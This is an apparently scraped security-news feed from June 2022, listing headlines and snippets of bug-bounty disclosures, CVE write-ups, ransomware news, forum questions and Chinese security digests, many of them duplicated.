    Reddit disclosed a bug submitted by marvelmaniac: https://hackerone.com/reports/1480569 - Bounty: $500
    Stored XSS on TikTok Live Form
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1542703 - Bounty: $1500
  • Open

    How I secured ISP (Internet Service Provider)
    Hello everyone hope all are safe and doing good. I am Cypher_Jerry Aka Harsha from Telangana, and a part-time bug bounty hunter. Continue reading on Medium »
    Bypass Email Confirmation
    Hello everyone. In this blog, I will share my finding on How I was able to bypass the email confirmation by just paying close observation… Continue reading on Medium »
    The Helio Bounty Program is now live
    We are pleased to announce the official start of the Helio Bounty Program for our community and security researchers. It is critical to… Continue reading on Medium »
    All onliners for bug bounty hunters
    check all oneliners below. Continue reading on Medium »
    $700 Bounty writeup
    Hello readers, Continue reading on Medium »
    Hacking into WordPress themes for CVEs and Fun.
    Hi there! I hope all is well with you. In this writeup, I’ll discuss about the research I did on a WordPress theme, which taught me a lot… Continue reading on Pentester Nepal »
    Aurora Stalls A Sizable DeFi Hack, Pays $6M Bug Bounty through Immunefi
    It could have been the next market-moving DeFi hack, but thanks to bug bounty! Continue reading on Medium »
    CSRF leads to account takeover in Yahoo!
    How I managed to hack the accounts of arbitrary users of a Yahoo! application in only 30 minutes. Continue reading on Medium »
    XSS Blind Stored at Asset Domain Android Apps TikTok
    Hi everyone Continue reading on Medium »
  • Open

    Caldera: Red Team Emulation (Part 1)
    This article aims to demonstrate an open-source breach & emulation framework through which red team activity can be conducted with ease. It focuses on MITRE The post Caldera: Red Team Emulation (Part 1) appeared first on Hacking Articles.
  • Open

    Caldera: Red Team Emulation (Part 1)
    This article aims to demonstrate an open-source breach & emulation framework through which red team activity can be conducted with ease. It focuses on MITRE The post Caldera: Red Team Emulation (Part 1) appeared first on Hacking Articles.
  • Open

    Are these skills are enough to get me a decent entry level job in pentesting ?
    I am studying engineering (1.5 years left to graduate) and wanna drop out badly, i am based in Egypt and wondering if these skills are enough to get me a decent entry level job in pentesting (remote or not) once i drop out. - 2 years experience in bug bounty hunting (only like 20 valid bugs cause it was besides college (xss, info disclosures, etc)) - solid programming experience ( been programming as a hobby for over 6 years honestly thats about it, i also know stuff like basic networking, linux (main OS), owasp top ten and more but the two points i mentioned earlier are best of what i can put on a resume. i also went for OSCP once and failed, gonna retake it but don't wanna put it here as a certainty of course :) Lets say i take a few months after dropping out to improve my resume, start a blog, write a few technical writeups, explain sec stuff and what not, also maybe find a few CVES to add to resume, is this enough to start applying ? how will not having a degree affect my chances? submitted by /u/watermelonSoundsNice [link] [comments]
  • Open

    CVE-2022-23088: Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack
    Article URL: https://www.thezdi.com/blog/2022/6/15/cve-2022-23088-exploiting-a-heap-overflow-in-the-freebsd-wi-fi-stack Comments URL: https://news.ycombinator.com/item?id=31768705 Points: 111 # Comments: 9
  • Open

    Attacks on Blockchain
    No content preview
  • Open

    Attacks on Blockchain
    No content preview
  • Open

    Attacks on Blockchain
    No content preview
  • Open

    SecWiki News 2022-06-16 Review
    CobaltStrike 流量分析与入侵检测 by ourren Google对于云安全未来的发展方向(CISO 云安全转型指南白皮书) by ourren CyberBattleSim(内网自动化渗透)研究分析 by ourren 一文读懂事件知识图谱 by ourren 信息安全BP的能力模型 by ourren 关于BIS的《信息安全控制:网络安全条目》的解读及影响分析 by ourren 《现有SBOM格式和标准调查》译文 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-16 Review
    CobaltStrike 流量分析与入侵检测 by ourren Google对于云安全未来的发展方向(CISO 云安全转型指南白皮书) by ourren CyberBattleSim(内网自动化渗透)研究分析 by ourren 一文读懂事件知识图谱 by ourren 信息安全BP的能力模型 by ourren 关于BIS的《信息安全控制:网络安全条目》的解读及影响分析 by ourren 《现有SBOM格式和标准调查》译文 by ourren 更多最新文章,请访问SecWiki
  • Open

    IOC-based threat hunting for free and without registration
    submitted by /u/Cultural_Budget6627 [link] [comments]
  • Open

    Hang Fire: Challenging our Mental Model of Initial Access
    For as long as I’ve been working in security, initial access has generally looked the same. While there are high degrees of variation… Continue reading on Posts By SpecterOps Team Members »
  • Open

    How to see the impact installing BApps might have on Burp Suite
    If you've ever installed any Burp extensions from the BApp Store, you'll know that it's a great way to extend your capabilities and tailor Burp Suite to your every need. If you've not, then what are y
  • Open

    How to see the impact installing BApps might have on Burp Suite
    If you've ever installed any Burp extensions from the BApp Store, you'll know that it's a great way to extend your capabilities and tailor Burp Suite to your every need. If you've not, then what are y
  • Open

    Lots of education videos & classes from few different sources
    I havent been through all of these yet but it seems to be up to date stuff. http://s28.bitdl.ir/Video/ submitted by /u/Allouttagoodnames [link] [comments]
    Help me!!!!
    Can anyone help me find the link or knows where I can download season 1 of gentleman jack series? I’ve searched for too long. Please help. submitted by /u/Bubbless02 [link] [comments]
  • Open

    CodeQL 数据库创建原理分析
    作者:六炅 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org Preface CodeQL是一款不错的代码分析扫描工具,于我而言对漏洞挖掘有很大的帮助。使用它也有一定时间了,之前一直接触的是开源项目,所以借助CodeQL进行数据库创建和分析还是相对简单的,不会有过多的限制。最近在进行Java反序列化利用链挖掘时,接触了...
  • Open

    CodeQL 数据库创建原理分析
    作者:六炅 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org Preface CodeQL是一款不错的代码分析扫描工具,于我而言对漏洞挖掘有很大的帮助。使用它也有一定时间了,之前一直接触的是开源项目,所以借助CodeQL进行数据库创建和分析还是相对简单的,不会有过多的限制。最近在进行Java反序列化利用链挖掘时,接触了...

  • Open

    OSINT: the art of discovering the existing
    By Luli Rosenberg Continue reading on Medium »
    War in Ukraine / June 14
    Europe wants Ukraine to prepare for negotiations Continue reading on Medium »
    404CTF — Nom d’une nouvelle [extrême] recrue #OSINT
    Continue reading on Medium »
  • Open

    Rate limit Bypass on contact-us through IP Rotator (burp extension)(https://www.linkedin.com/help/linkedin/solve/contact)
    LinkedIn disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1578121
    Delete direct message history without access the proper conversation_id
    Twitter disclosed a bug submitted by saiful6601: https://hackerone.com/reports/1487804 - Bounty: $560
    Remote 0click exfiltration of Safari user's IP address
    Twitter disclosed a bug submitted by max2x: https://hackerone.com/reports/1392211 - Bounty: $560
    The software does not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame, making it more su
    LinkedIn disclosed a bug submitted by suryasnn: https://hackerone.com/reports/1591504
    Golang : Add Query To Detect PAM Authorization Bugs
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1597437 - Bounty: $1800
    Golang : Hardcoded secret used for signing JWT
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1595009 - Bounty: $1800
    CPP: Add query for CWE-243 Creation of chroot Jail Without Changing Working Directory
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1582697 - Bounty: $1000
    Hyper Link Injection while signup
    UPchieve disclosed a bug submitted by 011alsanosi: https://hackerone.com/reports/1166073
  • Open

    A new vulnerability in Intel and AMD CPUs lets hackers steal encryption keys
    Article URL: https://arstechnica.com/information-technology/2022/06/researchers-exploit-new-intel-and-amd-cpu-flaw-to-steal-encryption-keys/ Comments URL: https://news.ycombinator.com/item?id=31759171 Points: 1 # Comments: 1
    SynLapse – Technical Details for Critical Azure Synapse Vulnerability
    Article URL: https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31752026 Points: 1 # Comments: 0
    SynLapse – Technical Details for Critical Azure Synapse Vulnerability
    Article URL: https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31748624 Points: 4 # Comments: 0
  • Open

    Pulling MikroTik into the Limelight
    submitted by /u/0xdea [link] [comments]
    Breaking Secure Boot on Google Nest Hub (2nd Gen) to run Ubuntu
    submitted by /u/Gallus [link] [comments]
    Pwn2Own 2021 Canon ImageCLASS MF644Cdw writeup
    submitted by /u/alain_proviste [link] [comments]
    TPM Sniffing Attacks Against Non-Bitlocker Targets
    submitted by /u/Gallus [link] [comments]
    Bypassing CSP with dangling iframes
    submitted by /u/Gallus [link] [comments]
  • Open

    Red Teaming reconnaissance Process
    Table of Contents Continue reading on Medium »
    Bug Bounty — Injection Part
    Injection flaws are very common in applications today. These flaws occur because user controlled input is interpreted as actual commands… Continue reading on Medium »
    PhpMyAdmin Setup is Accessible Without Authentication
    Description: Continue reading on Medium »
    Getting Started with AllianceBlock DEX on Mainnet
    We walk you through how to use the AllianceBlock DEX, as well as some updates on our progress on the development since we launched. Continue reading on Medium »
    Bypassing OTP verification
    We know that security is the main method of defense against hacker attacks. Some of these safeguards have not been prevailed… Continue reading on System Weakness »
  • Open

    Red Teaming reconnaissance Process
    Table of Contents Continue reading on Medium »
  • Open

    Practical Network Penetration Free Live Course
    submitted by /u/MDCDF [link] [comments]
    RAM acquisitions are extremely useful, but not often collected. This video shows how to speed up suspect password cracking with wordlists generated from RAM.
    submitted by /u/DFIRScience [link] [comments]
  • Open

    Doubt about having authenticators in a separated device
    Hello, The last year I almost get robbed with violence in the street. The robbers couldn't steal anything (they tried to take my phone). Since that day, I bought another device and set the authenticators there. That device will never leave my home, so, in case someone try to steal me or I lost my main phone, my accounts won't get affected. In case of travels, I take the backups codes with me. Do you think this is secure? Thanks for the help and have a good day. Edit: that device only has the authenticators installed and the antivirus. So, it's completely clean. submitted by /u/SilverPigtail [link] [comments]
    Gift for cybersecurity analyst
    Hi! Apologies if you get questions like this a lot, but I haven't seen anything in the last few months about it and I'm not sure how quickly the landscape changes. My husband is a cybersecurity analyst (comp eng degree? and is pretty interested in related things. For instance, I got him a raspberry pi and a pinewatch the last few bdays and he loved that. Would anybody have any suggestions for a gift? No particular price range as it's a big birthday coming up. Thanks in advance for any advice!! submitted by /u/roberl8 [link] [comments]
  • Open

    SecWiki News 2022-06-15 Review
    Google对于未来SOC的建设思考(自动化安全运营白皮书) by ourren 使用 Python 从泄露的日志中挖掘威胁情报的金矿 by ourren 自动化渗透测试工具开发实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-15 Review
    Google对于未来SOC的建设思考(自动化安全运营白皮书) by ourren 使用 Python 从泄露的日志中挖掘威胁情报的金矿 by ourren 自动化渗透测试工具开发实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    What I Learned In This Week In Cyber 6/16/22
    This week has been quite exciting in terms of what the concepts explored. Here is a highlight of some the concepts I delved into: Continue reading on CodeX »
    What I Learned In This Week In Cyber 6/16/22
    This week has been quite exciting in terms of what the concepts explored. Here is a highlight of some the concepts I delved into: Continue reading on Medium »
  • Open

    【安全通报】2022年6月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年6月 安全补丁,修复了针对 33 款微软产品的 55 个漏洞,其中12个权限提升漏洞,1个安全功能绕过漏洞,27个远程代码执行漏洞,11个信息泄露...
  • Open

    【安全通报】2022年6月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年6月 安全补丁,修复了针对 33 款微软产品的 55 个漏洞,其中12个权限提升漏洞,1个安全功能绕过漏洞,27个远程代码执行漏洞,11个信息泄露...
  • Open

    Some Website Back-ends
    Website back-ends with some image assets, vectors, and templates. https://16stitches.com/assets/frontend/images/ http://hotelgreenridge.com/wp-content/uploads/ https://huemint.com/assets/ submitted by /u/amritajaatak [link] [comments]
    [French Language Only] Limited Number of Films & TV Series
    http://www.vodservices-ftp.com/FTP_Upload/TEM/ submitted by /u/worldbbbbfree [link] [comments]
  • Open

    FreeBuf早报 | 尼日利亚制定草案监管互联网公司;谷歌修复 7 个 Chrome 浏览器漏洞
    新修订的《移动互联网应用程序信息服务管理规定》自2022年8月1日起施行。
    恶意软件竟被上架谷歌商店,下载次数甚至超200万次
    网络安全研究人员上个月在Google Play商店中发现了广告软件和窃取信息恶意软件。
    勒索又玩新花样,让受害者主动查询数据是否被盗
    为了提高勒索效率,勒索软件团伙BlackCat创建一个专门网站,允许受害者检查他们的数据是否在攻击中被盗。
    《移动互联网应用程序信息服务管理规定》将于8月1日施行
    新《规定》共27条,包括信息内容主体责任、真实身份信息认证、分类管理、行业自律、社会监督及行政管理等条款。
  • Open

    AdmirerToo from HackTheBox — Detailed Walkthrough
    No content preview
    Phishing Domain Detection using Neural Networks
    Applying neural networks on domain name analysis to detect phishing Continue reading on InfoSec Write-ups »
  • Open

    AdmirerToo from HackTheBox — Detailed Walkthrough
    No content preview
    Phishing Domain Detection using Neural Networks
    Applying neural networks on domain name analysis to detect phishing Continue reading on InfoSec Write-ups »
  • Open

    AdmirerToo from HackTheBox — Detailed Walkthrough
    No content preview
    Phishing Domain Detection using Neural Networks
    Applying neural networks on domain name analysis to detect phishing Continue reading on InfoSec Write-ups »
  • Open

    下一代 Windows 漏洞利用:攻击通用日志文件系统
    作者:360漏洞研究院 许仕杰 宋建阳 李林双 原文链接:https://vul.360.net/archives/438 概述 近两年通用日志文件系统模块 (clfs) 成为了 Windows 平台安全研究的热点,本文首先会介绍一些关于 clfs 的背景知识,然后会介绍我们是如何对这个目标进行 fuzz ,最后将分享几个漏洞案例以及我们是如何使用一种新方法实现本地提权。 背景知识 根据微软...
    Adobe Reader 漏洞 CVE-2021-44711 利用浅析
    作者:360漏洞研究院 李双 王志远 willJ 原文链接:https://vul.360.net/archives/434 背景 Adobe Reader 在今年 1 月份对外发布的安全补丁中,修复了一个由 Cisco Talos安全团队报告的安全漏洞,漏洞编号 CVE-2021-44711,经过分析,该漏洞与我们完成漏洞利用所使用的漏洞一致. 漏洞存在于与注释进行交互的 JavaScri...
    机架式设备漏洞挖掘
    作者:360漏洞研究院 原文链接:https://vul.360.net/archives/413 0x01 简介 lot设备漏洞挖掘,其实核心就是拿到运行在硬件设备内的“软件”,然后就变成了常规的软件漏洞挖掘。剩下的就是常规的漏洞挖掘步骤就跟软件漏洞挖掘步骤一致,进行逆向和审计即可。本文主要介绍机架式、虚拟镜像形式的防火墙堡垒机等安全设备的漏洞挖掘步骤及思路。文后也将展示部分相关设备的漏洞...
    Math.abs JIT Optimization Bug in JSC
    作者:360漏洞研究院 戴建军 原文链接:https://vul.360.net/archives/397 2021年天府杯我们成功完成iPhone 13 pro RCE的目标,这篇文章将会详细介绍其中使用到的Safari JavaScriptCore(JSC) 漏洞,漏洞编号为CVE-2021-30953。 ArithNegate 在JSC的JIT FTL优化过程中,对于 -n 的表达式会...
    USMA:用户态映射攻击
    作者:360漏洞研究院 刘永 王晓东 姚俊 原文链接:https://vul.360.net/archives/391 概述 众所周知,ROP是一种主流的Linux内核利用方式,它需要攻击者基于漏洞来寻找可用的gadgets,然而这是一件十分耗费时间和精力的事情,并且有时候很有可能找不到合适的gadget。此外由于CFI(控制流完整性校验)利用缓解措施已经被合并到了Linux内核主线中了,所...
  • Open

    下一代 Windows 漏洞利用:攻击通用日志文件系统
    作者:360漏洞研究院 许仕杰 宋建阳 李林双 原文链接:https://vul.360.net/archives/438 概述 近两年通用日志文件系统模块 (clfs) 成为了 Windows 平台安全研究的热点,本文首先会介绍一些关于 clfs 的背景知识,然后会介绍我们是如何对这个目标进行 fuzz ,最后将分享几个漏洞案例以及我们是如何使用一种新方法实现本地提权。 背景知识 根据微软...
    Adobe Reader 漏洞 CVE-2021-44711 利用浅析
    作者:360漏洞研究院 李双 王志远 willJ 原文链接:https://vul.360.net/archives/434 背景 Adobe Reader 在今年 1 月份对外发布的安全补丁中,修复了一个由 Cisco Talos安全团队报告的安全漏洞,漏洞编号 CVE-2021-44711,经过分析,该漏洞与我们完成漏洞利用所使用的漏洞一致. 漏洞存在于与注释进行交互的 JavaScri...
    机架式设备漏洞挖掘
    作者:360漏洞研究院 原文链接:https://vul.360.net/archives/413 0x01 简介 lot设备漏洞挖掘,其实核心就是拿到运行在硬件设备内的“软件”,然后就变成了常规的软件漏洞挖掘。剩下的就是常规的漏洞挖掘步骤就跟软件漏洞挖掘步骤一致,进行逆向和审计即可。本文主要介绍机架式、虚拟镜像形式的防火墙堡垒机等安全设备的漏洞挖掘步骤及思路。文后也将展示部分相关设备的漏洞...
    Math.abs JIT Optimization Bug in JSC
    作者:360漏洞研究院 戴建军 原文链接:https://vul.360.net/archives/397 2021年天府杯我们成功完成iPhone 13 pro RCE的目标,这篇文章将会详细介绍其中使用到的Safari JavaScriptCore(JSC) 漏洞,漏洞编号为CVE-2021-30953。 ArithNegate 在JSC的JIT FTL优化过程中,对于 -n 的表达式会...
    USMA:用户态映射攻击
    作者:360漏洞研究院 刘永 王晓东 姚俊 原文链接:https://vul.360.net/archives/391 概述 众所周知,ROP是一种主流的Linux内核利用方式,它需要攻击者基于漏洞来寻找可用的gadgets,然而这是一件十分耗费时间和精力的事情,并且有时候很有可能找不到合适的gadget。此外由于CFI(控制流完整性校验)利用缓解措施已经被合并到了Linux内核主线中了,所...
  • Open

    CVE-2022-29143 Microsoft SQL Server Remote Code Execution
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29143 Comments URL: https://news.ycombinator.com/item?id=31748201 Points: 4 # Comments: 0

  • Open

    Counting in Regexes Considered Harmful: Exposing ReDoS Vulnerability of Nonback
    Article URL: https://www.usenix.org/conference/usenixsecurity22/presentation/turonova Comments URL: https://news.ycombinator.com/item?id=31747225 Points: 1 # Comments: 0
    Intel and AMD Hertzbleed CPU Vulnerability Uses Boost Speed to Steal Crypto Keys
    Article URL: https://www.tomshardware.com/news/intel-amd-hertzbleed-cpu-vulnerability-boost-clock-speed-steal-crypto-keys Comments URL: https://news.ycombinator.com/item?id=31745490 Points: 1 # Comments: 0
    SynLapse – Technical Details for Critical Azure Synapse Vulnerability
    Article URL: https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31741670 Points: 7 # Comments: 1
  • Open

    Why Are My Junctions Not Followed? Exploring Windows Redirection Trust Mitigation
    Junctions are a feature of the NT file system – and a common way that attackers exploit file system redirection attacks. Learn about mitigation. The post Why Are My Junctions Not Followed? Exploring Windows Redirection Trust Mitigation appeared first on Unit 42.
  • Open

    Developer’s mistakes leads to full ATO!
    A wise man once sad “In order to get high quality bugs, start playing with the website’s functionalities.” Continue reading on Medium »
  • Open

    Windows Subsystem for Linux
    I am doing an investigation right now and found a ext4.Vhdx. When I researched this file it said that it would most commonly be associated with WSL allowing a user to run Linux commands without having to boot into a Linux partition. Is there any potential forensic value found here? And how do I get it to open. I exported it out and tried processing it with Axiom, but it didn’t really work. Edit: I was able to get it extracted from its zip file and loaded into Axiom. Looks like it is a 256GB size, but there are no files active. It is just empty space. Am I missing something or could this be some sort of thing where the user or malicious actor set it up and never used it? submitted by /u/trex4n6 [link] [comments]
    Entry level Certification recommendations
    Hi all, I am wondering what certifications you would recommend for someone going into DF? I am going to Kent state in the fall to get my BS in Computer Engineering Technology with a minor in computer forensics and security. I want recommendations for certifications that I could take as a HS grad. Thanks submitted by /u/swatteam23 [link] [comments]
    Passware On T2 macboo air help.
    I have a macbook air(2020) with t2 and password protected. Im trying to use passware's new t2 option and use a custom dictionary attack. Im getti g stuck at the DFU stage. Can someone private message me if they have any experience. Other details:Ive used multiple different cables witht out success.Im using my foreneic macbook pro , Big Sur. submitted by /u/james1234cb [link] [comments]
    Locked Cellphone
    So I have a locked cellphone and was recommended a software that is way to expensive. Since it is just one phone it was mention that back in the day they sent it to CAS. Anyone know more about the services/lab, example is it an accredited lab? Im going to reach out to them, but in the mean time though I would try here. Has anyone brought one of these devices to court after CAS touched it? submitted by /u/fanmajor2 [link] [comments]
    Volatility2 RHEL 8 profile
    I'm attempting to use Volatility to perform memory analysis on a RHEL8 .vmem file. Unfortunately the latest RHEL profile available at https://github.com/volatilityfoundation/profiles is for 6.7. I did see some example CLI where a LinuxRedhat8_3_4_18_0-240x64 profile was used. Can anyone by chance link/send me a RHEL8 profile for Volatility? submitted by /u/Styrophoams [link] [comments]
  • Open

    Red-Team Project Management
    Say you perform a red team assessment in a network. How do you keep track of your tools, agents, etc. that you've deployed during your project? Do you use any kind of software for documenting and saving your artifacts? How do you manage it when working with multiple people on your team? submitted by /u/w0rmh013x [link] [comments]
    Why it's important to remove stale devices on AD?
    I understand why it's important to deleted inactive users on AD, but why we should remove unused/dead devices? What is a security risks? submitted by /u/athanielx [link] [comments]
    What exactly does uPNP does?
    I have reading about uPNP, and I am stuck at whether we need to submit the wifi password in the uPNP device to connect it to a network? It says uPNP can auto configure and doesn't need authentication. We can simply specify the port number and it gets connects the device to that service. Does our smartphone use uPNP when getting connected to a Wifi network? What devices use uPNP? submitted by /u/mkkedia3 [link] [comments]
    Vivo Fibra with public IP routers, safe?
    Hi, hope you're all alright! So, Vivo is my ISP here in Brazil and they send their own router for you to connect to their fiber providers. These routers however have their public IP open to the internet, that I can only imagine is for support reasons. Through this IP, you can actually access the router interface (http, not https), with things like hardware model, serial number and software version freely accessible, only the configuration page is behind a login form. My fear is this is not a secure setup. I even searched my hardware model and found out a big CVE where you could get access though ssh, but I think is fixed on my machine. Another weird thing are the DNS6 servers (2001:12e0:0:1025:a080::115 and others), which cannot be changed. You can actually search this DNS on Google and find many such routers there. I never trusted Vivo, so I always used a personal router where my devices are connected and disabled their WiFi. I'm now disabling their IPv6, to avoid this Google thing. But is this safe? Are my fears not based on reality? submitted by /u/TiagodePAlves [link] [comments]
  • Open

    Hertzbleed - a new family of side-channel attacks
    submitted by /u/CyberMasterV [link] [comments]
    Oblivious HTTP
    submitted by /u/nangaparbat [link] [comments]
    Zimbra Email - Stealing Clear-Text Credentials via Memcache injection
    submitted by /u/0xdea [link] [comments]
    CVE-2022-25845 – Analyzing the Fastjson “Auto Type Bypass” RCE vulnerability
    submitted by /u/SRMish3 [link] [comments]
    What if you don't secure SSH on EC2? - Analysis of the real threats
    submitted by /u/capitangolo [link] [comments]
    Chaining vulnerabilities to criticality in Progress WhatsUp Gold
    submitted by /u/Mempodipper [link] [comments]
    Credential Protection in Chromium-based Browsers
    submitted by /u/jat0369 [link] [comments]
    If you want to play with Dogwalk windows vulnerability
    submitted by /u/cryptaureau [link] [comments]
    Quick Malware Analysis: Emotet Epoch 5 infection with spambot traffic pcap from 2022-04-04
    submitted by /u/dougburks [link] [comments]
  • Open

    Analysis of Chinese aircraft carriers their history, modifications, spotted places, and what the…
    The president of the United States, Joe Biden, has answered “yes” during a press conference on May 23, 2022 in South Korea, to the… Continue reading on Medium »
    Introduction to OSINT
    Open Source Intelligence (OSINT) is a collective term used to describe all techniques and tools used to harvest information from publicly… Continue reading on Medium »
    War in Ukraine / June 13
    Russia earned $98 billion from energy exports in 100 days of war Continue reading on Medium »
  • Open

    Introducing Ghostwriter v3.0
    The Ghostwriter team recently released v3.0.0. This release represents a significant milestone for the project, and there has never been a… Continue reading on Posts By SpecterOps Team Members »
    หนึ่งวันของทีม Cyber Security ที่ KBTG
    แม้ว่าลักษณะงานของทั้ง 3 ทีมจะแตกต่างกันออกไป แต่เรามีเป้าหมายที่เป็นอันหนึ่งอันเดียวกัน คือการทำให้ธนาคารปลอดภัยจากภัยคุกคามทางไซเบอร์ Continue reading on KBTG Life »
    How to set up and operate a red team in your company to support a sustainable cybersecurity…
    Hack yourself to prevent from being hacked. This more or less describes the term "Red Teaming." But why do you need a red team though you… Continue reading on CodeX »
    How to set up and operate a red team in your company to support a sustainable cybersecurity…
    Hack yourself to prevent from being hacked. This more or less describes the term "Red Teaming." But why do you need a red team though you… Continue reading on Medium »
  • Open

    SecWiki News 2022-06-14 Review
    Cloud I Hack into Google Cloud by h4ck01 Shodan 与 Censys 扫描一瞥 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-14 Review
    Cloud I Hack into Google Cloud by h4ck01 Shodan 与 Censys 扫描一瞥 by Avenger 更多最新文章,请访问SecWiki
  • Open

    THQ Nordic - Media and Game Assets
    submitted by /u/xD3CrypTionz [link] [comments]
  • Open

    How I found a Critical Bug in Instagram and Got 49500$ Bounty From Facebook
    No content preview
  • Open

    How I found a Critical Bug in Instagram and Got 49500$ Bounty From Facebook
    No content preview
  • Open

    How I found a Critical Bug in Instagram and Got 49500$ Bounty From Facebook
    No content preview
  • Open

    HTML Injection in E-mail
    Acronis disclosed a bug submitted by mega7: https://hackerone.com/reports/1536899
    Reflected Cross Site Scripting at ColdFusion Debugging Panel http://www.grouplogic.com/CFIDE/debug/cf_debugFr.cfm
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1166918
    Reflected Cross Site Scripting at http://www.grouplogic.com/files/glidownload/verify3.asp [Uppercase Filter Bypass]
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1167034
    Rails::Html::SafeListSanitizer vulnerable to xss attack in an environment that allows the style tag
    Ruby on Rails disclosed a bug submitted by windshock: https://hackerone.com/reports/1530898
  • Open

    信安标委发布《APP个人信息处理活动管理指南》征求意见稿
    《征求意见稿》针对移动智能终端提供了App个人信息安全功能设计、管理个人信息安全风险的指南,以增强App收集个人信息行为的明示程度。
    保持警觉,勒索软件HelloXD可能在你的系统上部署新后门
    近日,有观察人士发现,勒索软件HelloXD新部署了一个后门——MicroBackdoor,旨在加强其对受感染主机的持续远程访问。
    FreeBuf早报 | 微软今日起终止对IE浏览器的支持;智能商业建筑网络安全风险凸显
    在终止支持后,它将被新的基于 Chromium 的 Microsoft Edge 取代,用户在启动 IE11 时会自动重定向到 Edge。
    虚假私信钓鱼、假冒艺术家、高价转售:常见的NFT骗局
    一些涉及NFT的常见骗局,请注意识别避免上当。
    后量子密码学:改变在线安全
    从本质上讲,密码学只是保护和加密信息的一种手段。
    俄沙虫组织利用Follina漏洞,入侵乌克兰重点机构
    乌克兰计算机应急响应小组 (CERT) 警告说,俄罗斯黑客组织Sandworm可能正在利用名为Follina的漏洞攻击乌克兰。
    45% 的网络安全从业者因压力过大,考虑退出该行业
    压力过大的主要来自勒索软件的无情威胁和需要随时待命。
    SASE何时迎来市场爆发?
    SASE市场爆发还需要3~5年的时间,其中远程办公、物联网会是短期内推动这个市场的利好因素,可以多加关注。
    宜宾凯翼汽车有限公司招聘信息
    宜宾凯翼汽车有限公司招聘信息。
    WiFi探测正在跟踪、泄露隐私
    WiFi探测可以轻松获得用户的各种隐私信息,同时还可以实时跟踪用户。
    微软:Exchange 服务器正被用来部署 BlackCat 勒索软件
    据BleepingComputer网站6月13日消息,网络攻击者正通过BlackCat 勒索软件攻击存在漏洞的Microsoft Exchange 服务器。在微软安全专家观察到的案例中,攻击者使用未修补的 Exchange 服务器作为入口向量的初始攻击,两周后,再通过 PsExec 在网络上部署了 BlackCat 勒索软件有效负载。“虽然这些威胁参与者的常见入口向量包括远程桌面应用程序和受损凭据
  • Open

    CVE-2022-26134 being exploited to download and deploy the Cerber2021 ransomware
    Article URL: https://twitter.com/MsftSecIntel/status/1535417779960131584 Comments URL: https://news.ycombinator.com/item?id=31735573 Points: 2 # Comments: 0
  • Open

    Analysis Report on Recent Hidden Malicious Code Sites on a Chinese HFS HTTP File Servers
    submitted by /u/Late_Ice_9288 [link] [comments]

  • Open

    Exposed Travis CI API Leaves All Free-Tier Users Open to Attack
    submitted by /u/mkatch [link] [comments]
    The many lives of BlackCat ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    JWT attacks (with online labs)
    submitted by /u/albinowax [link] [comments]
    Privilege Escalation in Microsoft Azure Synapse Analytics
    submitted by /u/dinobyt3s [link] [comments]
    The State of CSRF Vulnerability in 2022
    submitted by /u/utku1337 [link] [comments]
  • Open

    Tenable CTF 2022 — Babby Web 2
    Same link? I wasn’t so sure at first. After poking a bit, I read the challenge again and “authentic” finally stuck out. This should have… Continue reading on Medium »
    Careers in Cyber | TryHackMe
    Lab Access: https://tryhackme.com/room/careersincyber Continue reading on Medium »
  • Open

    Hello
    Whats your opinion on Antiviruses because my mum is always saying "u nid antavarus coz money bank omy god ur so trash at computers" while most of antivirus programs are just a money rip off and you can just use your brain when using the computer submitted by /u/xblacky11 [link] [comments]
    How to secure a Bind DNS server exposed to Internet ?
    Any tools, utilities or recommandations to detect and block DNS attacks like amplification ? Please note that the server has to be exposed to Internet. submitted by /u/aim4r [link] [comments]
    PASTA real-life example
    I am looking for some real-life examples of PASTA applied to an organization/application. I have understanding of the process, the seven stages etc. I would like to see some actual inputs and outputs of all the seven stages. Is there anything like that available anywhere? submitted by /u/palm_snow [link] [comments]
  • Open

    War in Ukraine / June 10–12
    Ukraine needs 1,000 howitzers Continue reading on Medium »
    Fingerprinting email senders…
    Hello… Today we will discuss fingerprinting (logging) email senders. First, what is logging. This is the logging process i.e. information… Continue reading on Medium »
  • Open

    The many lives of BlackCat ransomware
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-06-13 Review
    SecWiki周刊(第432期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-13 Review
    SecWiki周刊(第432期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Remote Forensics on Live Systems
